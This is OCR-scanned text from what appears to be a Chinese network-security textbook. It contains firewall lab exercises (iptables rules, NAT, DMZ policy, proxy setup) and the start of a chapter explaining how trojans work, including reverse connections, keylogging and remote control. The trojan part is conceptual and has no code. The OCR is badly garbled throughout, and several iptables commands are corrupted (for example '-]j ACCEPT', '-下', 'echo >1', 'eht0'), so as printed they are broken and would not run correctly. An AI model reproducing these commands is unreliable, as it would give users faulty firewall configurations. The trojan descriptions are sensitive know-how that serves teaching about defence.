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ICMP 回 显 请 求 类 型 (  ) ;代码 (  )。 

ICMP 回 显 应 答 类 型 (  ); 代 码 (  )。 

iptables 命令 : 

iptables -I INPUT -p icmp -icmp -type 8/0 -j ACCEPT 

iptables -IOUTPUT -P icmp -icmp -type 0/0 -j ACCEPT 

利用 ping 指令 测试 主机 1 与 主机 2 的 连通 性 。 并 与 (4) 的 测试 结果 比较 。 
(6) 对 外 开放 Web 服务 (默认 端口 80/tcp) 。iptables 命令 : 

iptables -I INPUT -Ptcp -- dport 80 -]j ACCEPT 

iptables -I OUTPUT -P tcp -- sport 80 -j ACCEPT 

主机 1 利用 Nmap 对 主机 2 进行 端口 扫描 ,查看 扫描 结果 。 

(7) 设置 防火 墙 允 许 来 自 eth0( 假 设 eth0 为 内 部 网 络 接口 ) 的 任何 数据 通过 。iptables 


iptables -A INPUT -i eth0 -]j ACCEPT 
iptables -A OUTPUT -i eth0 -]j ACCEPT 


主机 1 利用 Nmap 对 当前 主机 进行 端口 扫描 ,查看 扫描 结果 。 

6. Linux 防火 墙 设计 

实验 目的 : 

(1) 了 解 防 火 墙 的 功能 和 原理 。 

(2) 熟悉 Linux 下 防火 墙 的 配置 。 

实验 设备 : 

(1) 硬件 : PC 4 台 , 其 中 1 台 带 双 网 卡 ;交换 机 1 台 ;Internet 接 入 点 1 个 。 

(2) 操作 系统 : 双 网 卡 PC 并 带 Linux 操作 系统 1 台 ; 其 他 3 台 PC 带 Windows 操作 系 
统 或 Linux 操作 系统 。 

实验 内 容 : 

(1) 构建 一 个 小 型 私有 网 络 。 

(2) 实现 私有 网 络 访问 外 部 网 络 。 

(3) 通过 Linux 服务 器 实现 防火 墙 功能 。 

实验 拓扑 如 图 3-9 所 示 。 

实验 要 求 : 

设计 一 个 防火 墙 ,用 于 保护 服务 器 和 内 部 网 络 的 安全 性 ,但 是 要 提供 访问 Internet 的 足 
够 功能 。 实 验 分 两 部 分 ,第 一 部 分 实现 列 出 的 所 有 功能 ,每 一 个 功能 至 少 可 有 一 条 命令 实 
现 ; 第 二 部 分 是 自己 设计 一 个 防火 墙 。 

【第 一 部 分 】 

步骤 1 Linux 服务 器 网 卡 地 址 配置 

外 部 网 卡 地 址 : 192. 168. 168. 3; 子 网 掩 码 : 255. 255. 255. 0; 网 关 : 192. 168. 168. 1 。 

内 部 网 卡 地 址 : 10. 10. 10. 1; 子 网 掩 码 : 255. 255. 255. 0; 网 关 : 无 ; 

3 台 PC: 子 网 掩 码 : 255.255. 255.0; 网 关 : 10. 10. 10. 1 。 
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Linux 系 统 Ce 
10.10.10.1 192.168.168.3 


山 中 吕 


10.10.10.2 10.10.10.3 10.10.10.4 
图 3-9 Linux 防火 墙 实 验 拓扑 


步骤 2 实现 内 部 网 络 访问 外 部 网 络 功能 

(1) 用 root 账号 登录 Linux 系统 ,启动 "系统 设置 "中 RedHat 的 “网 络 ” 一 项 ,将 其 打 
开 , 进 行 网 络 配 置 。 如 果 网 卡 已 经 配置 好 ,就 不 必 做 下 面 的 配置 。 

配置 外 部 网 卡 : 选 定 eth0, 单 击 “ 编 辑 ”, 设 置 IP 为 192. 168. 168. 3, 网 关 为 192. 168. 
168. 1, 子 网 掩 码 为 255. 255. 255. 0。 

配置 内 部 网 卡 : 选 定 ethl1, 单 击 “ 编 辑 ”, 设 置 IP 为 10. 10. 10.1, 子 网 掩 码 为 255. 255. 
255. 0。 

(2) 用 iptables 实现 NAT 功能 。 

@ 启动 “系统 工具 ” 栏 ,选择 “终端 ", 打 开 终端 控制 器 。 

@ 配置 NAT 功能 ,实现 内 部 网 络 能 够 访问 外 部 网 络 。 

配置 命令 (注意 大 小 写 和 空格 以 及 命令 的 先后 顺序 ): 


#modprobe ip_tables // 装 载 ip_tables 模块 
#iptables -下 // 清 空 filter 表 
#iptables -tnat -下 // 清 空 nat 表 


#iptables -A FORWARD -s 10.10.10.0/24 -j ACCEPT 
// 转 发 所 有 来 自 10.10.10.0 网 段 的 数据 包 到 外 部 网 络 
#iptables -A FORWARD -i eth0 -m state -~ state ESTABLISHED, RELATED - j ACCEPT 
// 允 许 所 有 已 经 建立 连接 的 数据 包 从 外 部 网 络 进入 内 
// 部 网 络 , 即 是 内 部 网 络 向 外 部 网 络 发 出 请 求 ,外 部 网 络 
// 返 回 的 数据 包 就 可 以 通过 防火 墙 
#iptables -+ nat -A POSTROUTING -oo eht0 -s 10.10.10.0/24 -j MASQUERADE 
// 将 所 有 来 自 内 部 网 络 的 数据 包 的 IP 地 址 由 
//10.10.10.* 换 成 192.168.168.3 
#echo >1 /proc/sys/net/ipv4/ip_forward // 启 动 ip_forward 功能 


@ 设置 3 台 PC 的 IP 网 络 配 置 . 用 ping 命令 测试 网 络 的 连通 性 。 
@ 将 配置 命令 的 第 4 行 中 的 10. 10. 10. 0/24 改 为 10.10.10.32/28, 对 应 网 关 改 为 10. 
10. 10. 33 ,将 PC 的 IP 地 址 改 为 10. 10. 10. 1、10. 10. 10. 34、10. 10. 10. 97, 测 试 各 台 PC 与 
网 络 的 连通 性 ,解释 上 面 出 现 的 现象 。 
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步骤 3 实现 简单 的 防火 墙 功 能 
下 面 的 功能 测试 所 用 的 站 点 : www. sysu. edu. cn、www. sina. com. cn,bbs. sysu. edu. 
cn,ftp. sysu. edu. cn。 
下 面 如 没有 特意 指明 禁止 所 有 流量 ,表示 其 他 流量 均 可 以 访问 。 测 试 WWW 服务 部 分 
时 ,浏览 器 不 设置 代理 服务 器 ,每 个 功能 单独 测试 ,做 完 一 个 功能 后 即 去 除 该 命令 。 
(1) 控制 内 部 网 络 访问 外 部 网 络 。 
数据 流 方向 : 内 部 网 络 一 外 部 网 络 。 
。 禁止 内 部 网 络 访问 外 部 站 点 www. sydu. edu. cn 的 所 有 流量 。 
。 禁止 内 部 网 络 访问 外 部 站 点 www. sysu. edu. cn 的 WWW 服务 流量 。 
。 禁止 内 部 网 络 访问 外 部 站 点 ftp. sysu. edu. cn 的 FTP 流量 。 
。 禁止 内 部 网 络 访问 外 部 站 点 bbs. sysu. edu. cn 的 Telnet 流量 。 
。 禁止 内 部 网 络 访问 外 部 站 点 202. 116. 64. 1 的 DNS 流量 。 
。 禁止 内 部 网 络 访问 外 部 站 点 202. 116. 64. 1 的 ping 流量 。 
将 上 面 的 内 部 网 络 改 成 内 部 网 络 中 的 某 台 主机 ,外 部 站 点 改 成 其 他 Internet 站 点 ,进行 
测试 。 
数据 流 方向 : 外 部 网 络 一 内 部 网 络 。 
。 禁止 外 部 站 点 www. sysu. edu. cn 访问 内 部 网 络 的 所 有 流量 。 
。 禁止 外 部 站 点 www. sysu. edu. cn 访问 内 部 网 络 的 WWW 服务 流量 。 
。 禁止 外 部 站 点 ftp. sysu. edu. cn 访问 内 部 网 络 的 FTP 流量 。 
。 禁止 外 部 站 点 bbs. sysu. edu. cn 访问 内 部 网 络 的 Telnet 流量 。 
。 禁止 外 部 站 点 202. 116. 64. 1 访问 内 部 网 络 的 DNS 流量 。 
。 禁止 外 部 站 点 202. 116. 64. 1 访问 内 部 网 络 的 ping 流量 。 
将 上 面 的 内 部 网 络 改 成 内 部 网 络 某 台 主 机 ,外 部 站 点 改 成 其 他 Internet 站 点 ,进行 
测试 。 
(2) 控制 服务 器 访问 外 部 网 络 ( 人 允许 内 部 网 络 访问 外 部 网 络 流量 通过 ) 。 
数据 流 方向 : 服务 器 一 外 部 网 络 。 
。 禁止 服务 器 访问 外 部 站 点 www. sysu. edu. cn 的 所 有 流量 。 
。 禁止 服务 器 访问 外 部 站 点 www. sysu. edu. cn 的 WWW 服务 流量 。 
。 禁止 服务 器 访问 外 部 站 点 ftp. sysu. edu. cn 的 FTP 流量 。 
。 禁止 服务 器 访问 外 部 站 点 bbs. sysu. edu. cn 的 Telnet 流量 。 
。 禁止 服务 器 访问 外 部 站 点 202. 116. 64. 1 的 DNS 流量 。 
。 禁止 服务 器 访问 外 部 站 点 202. 116. 64. 1 的 ping 流量 。 
将 上 面 的 外 部 站 点 改 成 其 他 Internet 站 点 ,进行 测试 。 
数据 流 方向 : 外 部 网 络 一 服务 器 。 
。 禁止 外 部 站 点 www. sysu. edu. cn 访问 服务 器 的 所 有 流量 。 
。 禁止 外 部 站 点 www. sysu. edu. cn 访问 服务 器 的 WWW 服务 流量 。 
。 禁止 外 部 站 点 ftp. sysu. edu. cn 访问 服务 器 的 FTP 流量 。 
。 禁止 外 部 站 点 bbs. sysu. edu. cn 访问 服务 器 的 Telnet 流量 。 
。 禁止 外 部 站 点 202. 116. 64. 1 访问 服务 器 的 DNS 流量 。 
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。 禁止 外 部 站 点 202. 116. 64. 1 访问 服务 器 的 ping 流量 。 

将 上 面 的 外 部 站 点 改 成 其 他 Internet 站 点 ,进行 测试 。 

【第 二 部 分 】 

请 参照 第 一 部 分 的 实验 内 容 , 自 定 规则 ,自行 设计 一 个 有 特色 的 防火 墙 ,并 写 出 设计 
思路 。 

7. 企业 防火 墙 边界 策略 实验 。 

当 一 个 网 络 连接 到 Internet 时 ,外 部 世界 就 可 以 访问 该 网 络 并 与 之 交互 。 为 了 保证 内 
部 网 络 的 安全 ,可 以 在 该 网 络 和 Internet 之 间 插 入 一 个 中 介 系 统 , 竖 起 一 道 安全 屏障 。 这 道 
屏障 的 作用 是 阻 断 来 自 外 部 网 络 的 威胁 和 入 侵 。 

实验 目的 : 构建 安全 的 企业 网 络 环境 。 

实验 拓扑 : 实验 网 络 拓扑 结构 如 图 3-10 所 示 , 实 验 网 络 由 6 台 主 机 和 一 个 防火 墙 组 成 。 
其 中 ,防火 墙 有 3 块 网 卡 ,分 别 与 Internet\DMZ 和 内 部 网 络 相 连接 。 

Web 服 务 器 FTP 服 务 器 Internet 


DMZ 区 Web DMZ 区 FTP 
服务 器 服务 器 


防火 墙 
Web 代 理 服务 器 


a 


3-10 实验 网 络 拓扑 结构 


© 


内 部 网 络 


角色 定义 : 对 图 3-10 中 的 各 主机 模拟 的 角色 定义 如 下 。 

主机 A、 主 机 B: 内 部 网 络 客户 主机 ,它们 是 企业 网 络 要 积极 保护 的 对 象 ,它们 有 权 访 
问 DMZ 区 各 服务 器 ,也 可 以 访问 外 网 (Internet)。 

主机 C: DMZ 区 Web 服务 器 ,向 内 网 主机 和 Internet 提供 Web 服务 。 

主机 D: DMZ 区 FTP 服务 器 ,向 内 网 主机 和 Internet 提供 FTP 服务 。 

主机 E: Internet 中 的 一 台 Web 服务 器 兼 客户 机 ,提供 HTTP 服务 。 

主机 下: Internet 中 的 一 台 FTP 服务 器 兼 客户 机 ,提供 FTP 服务 。 

防火 墙 : 外 网 (Internet) 内 网 和 DMZ 区 主机 连接 的 唯一 通道 ,防火墙 规 则 几乎 决定 了 
企业 网 络 的 一 切 访 问 权 ;另外 , 它 又 是 一 个 Web 缓存 代理 服务 器 ,代理 内 网 主机 对 外 部 
HTTP 的 访问 。 

访问 控制 策略 : 防火 墙 上 共有 一 个 网 络 接口 与 外 网 进行 通信 , 即 防火 墙 仅 有 一 个 网 络 接 
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口 对 于 外 网 来 说 是 可 见 的 。 图 3-11 描述 了 防火 墙 设置 的 网 络 访问 策略 。 


A 
内 部 网 络 
允许 访问 


3-11 访问 控制 策略 


图 3-11 中 的 虚线 箭头 表示 允许 被 动 连接 ,虽然 DMZ 中 的 主机 不 允许 访问 内 部 网 络 ,但 
其 对 内 部 网 络 的 应 答 是 允许 通过 的 。 

由 图 3-11 可 以 得 到 防火 墙 设 置 的 企业 网 络 访问 策略 如 下 : 

(1) 内 网 可 以 访问 外 网 。 主 机 A、 主 机 B 可 以 访问 Internet, 上 述 网 络 结构 中 主机 A、 
机 BB 可 以 访问 主机 EE 与 主机 下 。 

(2) 内 网 可 以 访问 DMZ。 主 机 A、 主 机 B 可 以 访问 主机 C.D, 便 于 对 主机 C.D 的 访问 
与 管理 。 

(3) 外 网 不 能 访问 内 网 。 由 于 内 网 主机 正 是 企业 所 要 保护 的 对 象 ,所 以 不 允许 主机 下 、 
F 访问 内 网 主机 A、 主 机 B。 

(4) 外 网 可 以 访问 DMZ。 企 业 通 过 DMZ 中 的 服务 器 (主机 C、D) 向 外 网 用 户 ( 主 机 EE、 
F) 提 供 服务 。 

(5) DMZ 不 能 访问 内 网 。 为 了 防止 DMZ 中 的 服务 器 被 攻陷 后 ,入 侵 者 以 其 作为 跳板 
(主机 C.D 没有 重要 的 资料 与 信息 ) 攻 击 内 部 网 络 , 所 以 通常 情况 下 不 允许 DMZ 区 中 的 主 
机 (主机 C.D) 访 问 内 网 主机 (主机 A、 主 机 B) 。 

(6) DMZ 允许 访问 外 网 。 主 机 C.D 能 够 访问 Internet( 主 机 E、F)。 

按 主 机 角色 配置 防火 墙 设置 .企业 网 络 测试 实验 步 又 , 写 出 实现 访问 控制 策略 的 实验 

8. 设防 火 墙 主机 上 的 两 块 网 卡 分 别 连接 两 个 网 段 ,其 中 网 卡 eth3 用 来 连接 外 网 ,其 IP 
地 址 为 172. 18. 187. 254/24; 网 卡 eth2 用 来 连接 内 网 ,其 IP 地 址 为 192. 168. 2.1/24。 内 网 
有 一 台 服 务 器 ,其 IP 地 址 为 192. 168. 2. 2 ,计划 开放 该 服务 器 的 SSH 服务 , WWW 服务 和 
FTP 服务 ,为 了 安全 起 见 , 在 防火 墙 上 设置 只 允许 FTP 服务 采用 被 动 模式 工作 。 网 络 拓扑 
如 图 3-12 所 示 。 

要 求 利 用 iptables 充当 网 关 防 火 墙 ,保护 内 网 主机 。 写 出 基于 iptables 的 解决 方案 。 

9. 代理 防火 墙 应 用 实验 。 

实验 条 件 : 

(1) 代理 服务 器 管理 : 在 目前 流行 的 代理 服务 器 软件 中 选用 一 种 (例如 NetProxy) 。 
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图 3-12 利用 iptables 实现 防火 墙 


(2) 基于 Windows 的 PC 2 一 3 台 ( 如 果 有 一 台 机 器 可 以 连接 到 外 网 , 则 只 需要 另 一 
机 器 做 内 网 主机 即 可 ;如 果 没 有 连接 外 网 的 主机 , 则 需要 将 一 台 主 机 配置 成 外 网 主机 ,一 
做 防火 墙 主机 ,一 台 做 内 网 主机 ) 。 

实验 任务 : 

(1) 在 未 安装 防火 墙 之 前 ,在 防火 墙 主 机 上 测试 外 网 主机 提供 的 Web 及 FTP 各 项 服 
务 是 否 正常 。 

(2) 安装 代理 服务 器 系统 (例如 NetProxy) ,并 根据 访问 需求 配置 代理 服务 。 

(3) 验证 内 网 主机 通过 代理 服务 器 访问 外 网 服务 。 

实验 内 容 : 

(1) 画 出 实验 拓扑 。 

实验 仅 以 内 网 主机 访问 外 网 Web 站 点 为 例 进 行 代理 服务 器 配置 和 检验 ,其 他 代理 服务 
配置 类 似 , 不 再 重复 。 

(2) 配置 网 络 环境 。 

@ 无 Internet 连接 环境 。 

防火 墙 主机 A: 内 网 IP 地 址 配置 为 192. 168. 0. 1/24; 外 网 IP 地 址 配置 为 219. 220. 
224. 1/24。 

内 网 主机 B: IP 地 址 配置 为 192. 168. 0. 2/24。 

外 网 主机 C: IP 地 址 配置 为 219. 220. 224. 2/24 ,并 配置 Web 服务 器 。 

测试 : 从 防火 墙 主机 A 访问 外 网 主机 C 提供 的 Web 网 站 是 否 成 功 。 

@ 有 Internet 连接 环境 。 

防火 墙 主 机 A: 配置 并 测试 访问 Internet 的 Web 站 点 ,然后 在 网 卡 上 增加 配置 内 网 IP 
地 址 192. 168. 0. 1/24。 

内 网 主机 B: IP 地 址 配置 为 192. 168. 0. 2/24。 

(3) 安装 程序 。 安 装 代理 服务 软件 (例如 NetProxy) ,一 般 按 默认 选项 安装 。 

(4) 设置 代理 服务 。 

Q@ 打开 代理 服务 器 设置 代理 的 界面 (例如 NetProxy 窗口 中 的 WWW Proxy Service)， 
输入 内 网 访问 端口 号 ,并 绑 定 IP 地 址 和 启动 此 项 代理 服务 。 

@ 打开 代理 服务 器 设置 防火 墙 规则 的 界面 (例如 单 击 NetProxy 窗口 工具 栏 的 小 锁 图 
标 , 打 开 Add Incoming Firewall Rules 窗口 ) .设置 进入 内 网 的 IP 地 址 和 服务 限制 。 
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(5) 内 网 主机 连接 代理 防火 墙 设置 。 

在 内 网 主机 B 上 打开 浏览 器 ,执行 菜单 上 的 “工具 ”>“Internet 选项 ”~ 连接 ”一 ”局 域 
网 设置 "命令 ,选中 “为 LAN 使 用 代理 服务 器 (这 些 设置 不 会 应 用 于 拨号 或 VPN 连接 )”, 输 
入 代理 防火 墙 主 机 A 的 WWW Proxy Service 服务 设置 的 内 网 IP 地 址 和 端口 。 

(6) 内 网 主机 连接 外 网 防火 墙 测试 。 

在 内 网 主机 B 的 下 浏览 器 中 输入 要 访问 的 外 网 的 Web 站 点 的 URL 地 址 ,看 是 否 能 
连接 成 功 。 
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第 4 章 木马 技术 


木马 是 目前 Internet 上 最 严重 的 安全 威胁 之 一 ,本 章 详 述 了 木马 的 技术 原理 及 其 植 入 、 
加 载 、 隐 藏 等 关键 技术 ,通过 实例 说 明 木 马 的 危害 。 


4.1 木马 概述 


1. 木马 的 概念 

木马 是 指 系统 中 被 植 人 的 人 为 设计 的 程序 ,目的 是 通过 网 络 远 程控 制 其 他 用 户 的 计算 
机 系统 ,窃取 信息 资料 , 即 “ 把 预谋 的 功能 隐藏 在 公开 的 功能 里 ,掩饰 其 真正 的 企图 ”。 

最 早 的 计算 机 木马 是 1986 年 的 PC-Write 木马 。 它 伪装 成 共享 软件 PC-Write 的 2. 72 
版 本 (事实 是 编写 PC-Write 的 Quicksoft 公司 从 未 发 行 过 2. 72 版 本 ), 如 果 用 户 信 以 为 真 ， 
运行 了 该 木马 程序 ,其 后 果 是 用 户 的 硬盘 就 会 被 格式 化 。 

木马 实际 上 是 一 种 远程 控制 软件 (也 称 为 后 门 软件 ) ,其 作用 就 是 利用 操作 系统 的 漏洞 
或 者 使 用 者 的 朴 忽 来 侵入 系统 ,并 在 远程 控制 下 从 系统 内 部 实施 攻击 。 特 洛 伊 木马 是 一 种 
比较 早期 的 远程 控制 软件 。 

2. 木马 和 病毒 的 区 别 

木马 与 病毒 因为 有 一 些 共 同 的 特征 , 且 都 属于 人 为 编写 的 计算 机 恶意 程序 ,所 以 经 常 被 
混淆 ,但 两 者 是 有 区 别 的 。 病 毒 具 有 传染 性 和 破坏 性 ,有 自我 复制 能 力 ,主要 感染 可 执行 文 
件 ,通过 插入 文件 内 部 、 外 部 加 这 等 方式 寄生 于 宿主 文件 ,在 感染 系统 后 一 般 进行 破坏 性 操 
作 。 木 马 则 注重 可 控 性 和 隐藏 性 ,通常 以 独立 文件 形式 存在 ,不 感染 正常 文件 ,在 植 入 计算 
机 后 进行 伪装 和 潜伏 ,能 够 根据 控制 端 指 令 完 成 穷 取 用 户 资料 破坏 文件 甚至 远程 操控 等 
任务 。 

一 般 认为 ,病毒 的 创造 者 主要 是 为 了 炫耀 自己 天 才 的 创意 ,通过 自我 复制 传播 并 做 出 不 
可 思议 的 效果 (花屏 、 死 机 等 ) ,满足 了 制造 者 的 成 就 感 。 而 木马 的 创造 者 虽然 也 有 恶搞 的 成 
分 ,但 主要 目的 是 为 了 安插 系统 后 门 和 盗 取 资 料 。 鉴 于 木马 的 巨大 危害 性 和 它 与 早期 病毒 
的 作用 性 质 不 一 样 ,所 以 木马 虽然 属于 病毒 中 的 一 类 ,但 被 单独 从 病毒 类 型 中 间 剥 离 出 来 ， 
并 将 其 称 之 为 “木马 ”。 

目前 木马 和 病毒 的 区 别 正 在 逐渐 消失 。 病 毒 为 了 获取 更 多 的 信息 ,会 定期 发 作 , 有 意 破 
坏 计算 机 系统 ,基本 都 是 后 台 隐蔽 ,长 期 埋伏 ,以 木马 的 方式 获取 用 户 信息 。 木 马 为 了 进入 
并 控制 更 多 的 计算 机 , 业 合 了 病毒 的 编写 方式 ,不 仅 能 够 自我 复制 ,而 且 还 能 够 通过 病毒 的 
手段 防止 专门 软件 的 查 杀 。 

木马 和 病毒 的 危害 性 难 分 伯仲 ,甚至 现在 已 经 把 木马 作为 病毒 的 一 种 进行 归 类 ,现在 
“木马 ” 常 被 称呼 为 “木马 病毒 ”。 
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4.2 计算 机 木马 


木马 是 一 种 恶意 程序 ,一 般 利用 计算 机 系统 或 第 三 方 软件 的 漏洞 植 人 到 目标 计算 机 ,并 
在 其 上 隐蔽 运行 ,执行 未 经 授权 的 操作 。 其 目的 是 窃取 远程 主机 上 的 私密 信息 (例如 账号 、 
密码 ) ,通过 网 络 回 传 到 指定 服务 器 ,造成 用 户 隐私 的 泄露 。 同 时 ,网 络 攻击 者 还 能 利用 木马 
远程 控制 用 户 系统 ,操作 文件 .安装 或 印 载 程序 .键盘 记录 ,发 动 新 的 攻击 等 ,使 被 控制 系统 
成 为 攻击 者 的 “肉鸡 ?而 随意 操控 。 木 马 以 其 隐蔽 性 强 、 攻 击 范围 广 .危害 大 等 特点 成 为 目前 
最 常见 的 攻击 技术 ,对 Internet 的 安全 构成 了 严重 威胁 。 


4.2.1 木马 工作 原理 


木马 是 隐藏 在 目标 系统 中 的 具有 特殊 功能 的 代码 ,其 目的 是 执行 未 授权 的 操作 ,这 些 操 
作 包 括 获取 系统 口令 、 账 号 密码 以 及 远程 控制 目标 机 器 等 。 木 马 在 控制 技术 上 具备 远程 控 
制 软件 的 大 部 分 功能 ,与 正常 的 远程 应 用 软件 相 比 ,其 区 别 在 于 远程 控制 的 合法 性 。 合 法 的 
远程 控制 软件 是 为 了 方便 管理 而 主动 安装 的 ,例如 著名 的 “网 络 人 ”远程 控制 软件 。 而 木马 
是 在 用 户 不 知情 的 情况 下 偷偷 安装 的 ,属于 典型 的 非法 远程 控制 软件 ,例如 “冰河 "木马 。 木 
马 这 种 非法 特性 迫使 其 开发 者 采用 各 种 伪装 技术 隐藏 自己 ,以 免 被 发 现 。 

木马 一 般 采 用 客户 /服务 器 (Client/ Server,C/S) 模 式 的 程序 结构 。 木 马 的 客户 端 程序 
运行 在 网 络 攻击 者 的 机 器 上 ( 称 为 控制 端 或 控制 机 ) ,而 服务 端 程序 运行 在 被 攻击 的 目标 机 
器 上 ( 称 为 受 控 端 或 目标 机 ) ,如 图 4-1 所 示 。 木 马 客户 端 主要 负责 配置 .监控 服务 端 ,发 送 
攻击 命令 ,获取 来 自 服务 端的 执行 结果 。 木 马 服务 端 则 负责 搜集 目标 系统 信息 ,接收 客户 端 
命令 ,并 将 执行 结果 通过 网 络 传 回 客户 端 。 在 网 络 安全 领域 常 说 的 “中 马 ” 是 指 攻击 者 使 用 
各 种 方法 (欺骗 .网 站 挂 马 、 漏 洞 利 用 等 ) 已 经 把 木马 服务 端 程序 通过 网 络 植 人 被 攻击 系统 ， 
并 且 木 马 服务 端 程序 在 目标 系统 中 运行 。 一 旦 木马 服务 端 开始 运 行 , 攻 击 者 就 要 试图 通过 
网 络 和 服务 端 取得 联系 。 


木马 客户 端 


返回 信息 | | @ 
攻击 者 (控制 端 或 控制 机 te 
被 攻击 者 ( 受 控 端 或 目标 机 ) 


图 4-1 木马 的 一 般 工作 模式 


木马 客户 端 和 服务 端的 连接 方式 分 为 正 向 连接 和 反 向 连接 。 正 向 连接 是 指 服务 端 在 目 
标 系统 上 打开 端口 监听 ,由 客户 端 主动 发 起 与 服务 端的 连接 ; 反 向 连接 是 指 客户 端 不 主动 连 
接 服务 端 ,而 是 打开 端口 等 待 服务 端的 连接 。 早 期 的 木马 大 量 使 用 正 向 连接 技术 ,如 
BO2K .冰河 ,但 是 随 着 防火 墙 等 安全 软件 的 日 益 强 大 ,对 外 部 到 内 部 的 主动 连接 采取 了 更 
为 严格 的 过 滤 机 制 ,从 而 阻止 了 大 部 分 外 部 连接 请 求 , 使 木马 的 这 类 连接 途径 逐渐 失效 。 为 
了 穿 透 防 火 墙 , 越 来 越 多 的 木马 采用 反 向 连接 技术 (又 称 反 弹 端口 技术 ), 如 “ 灰 饮 子 ”“ 广 外 
男生 ”等 。 该 技术 利用 防火 墙 一 般 不 会 拦截 从 内 部 到 外 部 的 连接 的 特点 ,由 服务 端 发 起 对 客 
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户 端的 连接 ,达到 控制 机 和 防火 墙 之 后 的 目标 机 建立 连接 的 目的 。 
一 旦 服务 端 和 客户 端的 连接 建立 ,程序 的 C/S 架构 完成 ,木马 就 开始 工作 。 木 马 的 工 
作 大 致 可 分 为 如 下 4 个 流程 ,如 图 4-2 所 示 。 
@ 攻 击 指令 
已 四 ~ 本 @ 服 务 端 接收 指令 
攻击 者 @ 结 果 回 传 ee 图 服务 端 执行 指令 
人 (木马 服务 端 
图 4-2 木马 工作 流程 


(1) 攻击 者 发 送 指令 到 木马 服务 端 ,这 些 指令 可 包括 文件 操作 、 注 册 表 修改 、 远 程 shell 
执行 、 特 定 账 号 获取 等 攻击 性 质 的 命令 ,也 可 包括 服务 端 停止 运行 、 更 新 服务 端 、 印 载 服 务 端 
等 防守 性 质 的 命令 。 

(2) 木马 服务 端 通过 网 络 接收 攻击 指令 。 

(3) 服务 端 解析 收 到 的 指令 ,并 调用 相关 的 功能 模块 执行 。 调 用 的 模块 可 能 是 木马 子 
程序 ,也 可 能 是 系统 进程 (如 cmd. exe)。 

(4) 服务 端 获 得 执行 的 结果 ,通过 网 络 把 结果 数据 返回 给 客户 端 ,然后 等 待 接收 新 的 
指令 。 
木马 C/S 之 间 的 通信 主要 是 基于 TCP/IP 协议 的 。 由 于 建立 连接 的 通信 方式 可 能 被 
发 现 ,一 些 木马 使 用 了 无 连接 的 通信 协议 ,如 ICMP 木马 。 因 为 ICMP 报 文 由 系统 内 核 或 
进程 直接 处 理 而 不 经 过 端口 ,避免 了 直接 的 连接 和 使 用 端口 而 受到 监控 。 


4.2.2 木马 功能 及 特征 


木马 程序 对 目标 计算 机 系统 具有 强大 的 控制 能 力 。 和 其 他 后 门类 恶意 程序 一 样 ,木马 
能 让 网 络 攻 击 者 获得 受 控 主 机 系统 的 最 高 操作 权限 。 木 马 一 般 具 有 的 功能 如 下 。 

(1) 账号 /密码 窃取 。 所 有 明文 形式 的 密码 都 能 被 木马 侦 测 到 ,而 且 一 些 木 马 还 通过 键 
盘 记 录 来 获取 用 户 击 键 ,形成 击 键 记录 的 日 志文 件 发 送 给 木马 控制 者 。 木 马 控 制 者 可 以 从 
中 分 析 可 能 的 用 户 名 、 密 码 等 用 户 信息 。 

(2) 远程 文件 操作 。 攻 击 者 一 旦 连接 上 受 控 主机 ,就 可 以 对 目标 系统 的 文件 进行 各 种 
常规 操作 ,如 查看 \ 修 改 、 重 命名 删除、 下 载 等 ,并 且 可 以 将 文件 上 传 到 受 控 机 。 

(3) 注册 表 操作 。 攻 击 者 可 以 像 操作 自己 的 机 器 一 样 ,任意 修改 受 控 系统 的 注册 表 , 包 
括 对 主键 . 子 键 、 键 值 的 新 建 、 删 除 . 重 命名 和 修改 。 

(4) 安装 网 络 服务 。 通 常 攻击 者 会 借助 木马 为 受 控 系 统 安装 需要 的 网 络 服务 ,使 其 成 
为 网 络 上 的 服务 器 。 

(5) 屏幕 实时 监控 。 很 多 木马 具有 实时 截取 受 控 主机 屏幕 图 像 的 功能 ,攻击 者 通过 该 
功能 监视 目标 系统 的 操作 ,这 使 得 通过 软 键盘 输入 密码 未 必 安 全 。 木 马 甚至 能 自动 开启 摄 
像 头 , 必 要 时 还 能 通过 命令 实时 控制 目标 的 鼠标 和 键盘 。 

(6) 系统 操作 。 主 要 是 注销 、 重 启 ,关闭 目标 系统 ,查看 、 结 束 系 统 运 行 的 进程 或 启动 新 
的 进程 , 断 开 系 统 网 络 连 接 , 停 止 系统 服务 等 。 

一 般 木 马 都 具有 全 部 或 部 分 以 上 功能 。 像 Subseven、“ 灰 蚀 子 "这样 的 大 型 木马 ,不 但 
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可 以 操作 文件 .注册 表 、 监 视屏 幕 等 ,还 能 寻找 搜集 系统 敏感 信息 ,同时 具备 强大 的 反 检 测 能 
力 。 而 像 downloader、Keylogger、Win-ftp 这 样 的 简单 木马 ,只 有 部 分 或 单一 功能 ,比如 下 
载 其 他 恶意 程序 、 记 录 击 键 \ 开 启 FTP 服务 和 端口 等 。 

不 论 木 马 具 有 怎样 的 功能 ,用 何 种 语言 编写 ,在 哪 种 平台 上 运行 ,它们 都 具有 下 面 的 共 
同 特征 : 

(1) 隐蔽 性 。 这 是 木马 最 基本 的 特征 , 它 决 定 了 木马 的 生存 周期 。 木 马 为 了 保护 自身 
不 被 发 现 , 通 常 具有 很 强 的 隐蔽 性 ,如 捆绑 在 启动 文件 中 ,伪装 在 普通 文件 中 、 隐 藏 在 配置 文 
件 中 等 等 。 

(2) 欺骗 性 。 木 马 程 序 经 常会 采用 同 种 文件 名 的 欺骗 手段 。 木 马 的 文件 名 和 系统 文件 
名 非常 相似 ,如 exploer 这 样 的 文件 名 ,以 此 来 与 系统 中 的 合法 程序 explorer 相 混 淆 。 或 者 
是 和 系统 文件 名 相同 ,但 在 不 同文 件 夹 下 。 

(3) 自 启动 性 。 木 马 在 植 人 目标 机 后 ,其 第 一 要 务 就 是 如 何 运行 起 来 。 通 常 木马 程序 
通过 修改 系统 的 配置 文件 或 注册 表 文 件 , 在 目标 系统 启动 时 就 自动 加 载运 行 。 其 他 方式 是 
附加 或 捆绑 在 系统 程序 或 者 其 他 应 用 程序 上 ,或 者 干脆 替代 它们 的 关键 文件 ,如 特洛伊 
DLL( 也 叫 DLL 陷阱 ) 。 

(4) 自动 恢复 性 。 很 多 木马 程序 不 再 由 单一 文件 组 成 ,而 是 呈现 模块 化 , 且 具 备 多 重 备 
份 , 可 以 在 被 删除 后 进行 相互 恢复 。 同 时 也 有 些 木 马 具 备 多 线程 .多 进程 守护 ,一 旦 发 现 木 
马 进 程 被 结束 ,立即 重新 启动 木马 进程 恢复 运行 。 


4.2.3 木马 分 类 


